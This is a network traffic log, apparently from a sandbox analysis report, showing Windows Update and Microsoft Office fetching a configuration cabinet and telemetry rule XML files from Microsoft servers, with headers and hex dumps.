                                                                                                                                                                                          2024-11-23 16:44:20 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bGAb88btcw5v4GD&MD=uxdHDVbu HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                                          2024-11-23 16:44:21 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                          MS-CorrelationId: ce916aaf-ee64-427e-9339-1263ad541b1c
                                                                                                                                                                                          MS-RequestId: 229846bb-3bd1-4bc0-bf64-0cca11f86391
                                                                                                                                                                                          MS-CV: rHa4NCLEr0igj2lc.0
                                                                                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:21 GMT
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 24490
                                                                                                                                                                                          2024-11-23 16:44:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                          2024-11-23 16:44:22 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          8192.168.2.54971413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:21 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:22 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:22 GMT
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Content-Length: 218853
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public
                                                                                                                                                                                          Last-Modified: Fri, 22 Nov 2024 01:49:48 GMT
                                                                                                                                                                                          ETag: "0x8DD0A97F285E80B"
                                                                                                                                                                                          x-ms-request-id: ac3306f4-b01e-00ab-523b-3ddafd000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164422Z-15b8b599d88wn9hhhC1TEBry0g000000038000000000a31b
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:22 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                                                                                          Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                                                                                          Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                                                                                          Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                                                                                          Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                                                                                          Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                                                                                          Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                                                                          2024-11-23 16:44:23 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                                                                                          Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          9192.168.2.54971913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:25 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 2980
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                          x-ms-request-id: 6b6b0dda-801e-0083-096a-3cf0ae000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164425Z-174c587ffdfx984chC1TEB676g000000035000000000esta
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:25 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          10192.168.2.54971713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:25 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 3788
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                          ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                          x-ms-request-id: f08fc492-601e-0002-7931-3da786000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164425Z-178bfbc474btvfdfhC1NYCa2en00000004sg00000000cq38
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:26 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          11192.168.2.54972013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:25 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 2160
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                          x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164425Z-178bfbc474bpscmfhC1NYCfc2c00000003cg000000003e75
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
